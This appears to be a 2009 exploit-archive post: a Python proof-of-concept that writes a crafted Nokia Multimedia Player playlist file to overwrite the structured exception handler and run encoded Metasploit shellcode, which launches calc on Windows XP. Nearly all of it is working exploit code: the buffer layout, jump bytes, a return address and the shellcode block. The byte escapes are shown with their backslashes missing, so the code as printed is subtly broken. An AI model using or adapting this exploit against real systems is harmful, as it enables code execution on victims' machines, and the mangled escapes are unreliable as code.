nokiamp-overwrite.txt
Posted on 09 March 2009
#usage: exploit.py print "**************************************************************************" print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit " print " Founder : 0in" print " Exploited by : His0k4" print " Tested on: Windows XP Pro SP2 Fr " print " Greetings to:" print " All friends & muslims HaCkers(dz) " print "**************************************************************************" buff = "x41" * 1880 next_seh = "xEBx06x41x41" nops = "x90"*19 seh = "x0ExD2x8Ex01" #yes universal :D # win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com shellcode = ( "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax67" "x58x50x30x42x30x42x6bx42x41x77x41x42x32x42x41x32" "x41x41x30x41x41x58x38x42x42x50x75x6bx59x79x6cx6b" "x58x37x34x53x30x35x50x53x30x6cx4bx41x55x47x4cx6c" "x4bx51x6cx63x35x54x38x77x71x7ax4fx6ex6bx70x4fx74" "x58x4ex6bx43x6fx37x50x43x31x5ax4bx47x39x4ex6bx37" "x44x6cx4bx45x51x58x6ex37x41x6bx70x6cx59x6cx6cx4f" "x74x6fx30x62x54x47x77x6bx71x59x5ax76x6dx74x41x6b" "x72x58x6bx69x64x65x6bx41x44x47x54x34x44x44x35x38" "x65x6ex6bx33x6fx31x34x37x71x6ax4bx51x76x6ex6bx44" "x4cx42x6bx6ex6bx43x6fx57x6cx55x51x6ax4bx4cx4bx47" "x6cx4ex6bx75x51x4ax4bx4ex69x31x4cx66x44x37x74x4f" "x33x55x61x4fx30x30x64x6ex6bx77x30x36x50x4ex65x39" "x50x31x68x64x4cx6cx4bx73x70x36x6cx6ex6bx30x70x37" "x6cx6cx6dx4ex6bx45x38x45x58x58x6bx73x39x6ex6bx4b" "x30x4ex50x75x50x73x30x63x30x6cx4bx45x38x65x6cx31" "x4fx30x31x4cx36x75x30x32x76x6dx59x59x68x6cx43x4b" "x70x41x6bx46x30x45x38x48x70x4ex6ax65x54x43x6fx71" "x78x4fx68x59x6ex4cx4ax76x6ex52x77x6bx4fx6bx57x72" "x43x53x51x30x6cx52x43x77x70x67" ) exploit = buff + next_seh + seh + nops + shellcode try: out_file = open("nokia.npl",'w') out_file.write(exploit) out_file.close() print "Exploit file created! " except: print "Error"
